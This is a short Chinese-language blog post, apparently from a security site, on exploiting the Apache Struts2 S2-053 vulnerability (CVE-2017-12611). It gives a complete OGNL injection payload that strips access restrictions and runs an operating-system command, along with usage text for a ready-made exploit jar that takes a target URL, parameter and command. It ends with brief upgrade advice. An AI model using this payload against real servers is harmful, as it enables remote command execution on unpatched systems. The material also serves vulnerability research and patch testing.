释放双眼,带上耳机,听听看~!
S2-053利用过程漏洞介绍: https://www.secfree.com/article-339.html下载Demo程序: Struts2-053-Demo.zip
S2-053利用过程
漏洞介绍:
https://www.secfree.com/article-339.html
下载Demo程序:
部署Demo程序:
Tomcat下部署Struts2-053-Demo.war
…部署省略…
Poc:
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream(),"GBK"))}
Exp:
使用方法:
[!]CVE ID : CVE-2017-12611 [!]Affects Version : Struts 2.0.1 -Struts 2.3.33, Struts 2.5 - Struts 2.5.10 [!]Reference: : https://cwiki.apache.org/confluence/display/WW/S2-053 [!]Usage : java -jar S2-053.jar <url> <param> <command> [!]Example : "http://127.0.0.1/" "name" "whoami" [!]Author : www.secFree.com By Bearcat
解决方案:
检查您的代码并清除易受攻击的构造。
由于2.5.12版本仍然受到近日的S2-052漏洞影响 , 建议用户直接升级到最新的2.5.13版本。
S2-052漏洞详情:https://www.secfree.com/article-333.html
https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.13
